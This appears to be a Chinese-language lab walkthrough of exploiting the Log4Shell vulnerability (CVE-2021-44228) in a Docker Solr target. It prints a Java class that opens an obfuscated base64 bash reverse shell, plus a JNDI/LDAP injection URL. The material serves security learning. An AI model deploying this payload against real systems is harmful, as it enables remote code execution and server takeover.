Log4j2-CVE-2021-44228

Log4j2-CVE-2021-44228

Black 天启互联网实验室 2023-12-26 19:54

一、环境搭建

机器:kali Linux
Java:jdk8
python:python3.7.x

二、在docker里面搭建靶机环境

三、访问

四、构造payload

五、替换

将上面构造好的反弹shell语句替换

import java.lang.Runtime;import java.lang.Process;public class Exploit {     public Exploit(){             try{                
Runtime.getRuntime().exec(“bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}”);                                }catch(Exception e){                                            e.printStackTrace();                                             }                }         public static void main(String[] argv){                         Exploit e = new Exploit();                            }}

将上面文件放进Exploit.java文件,在Windows用javac进行编译成Exploit.class,记得切换成 jdk8!

然后放进kali里面查看

六、开启恶意站点

用python在含有java.class开启http服务

访问一下,看看效果

七、用marshalsec-0.0.3-SNAPSHOT-all.jar插件开启LADP监听

八、开启监听端口

九、传入恶意参数

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://192.168.217.128:1389/Exploit}

十、查看效果

如上图所示即反弹shell成功!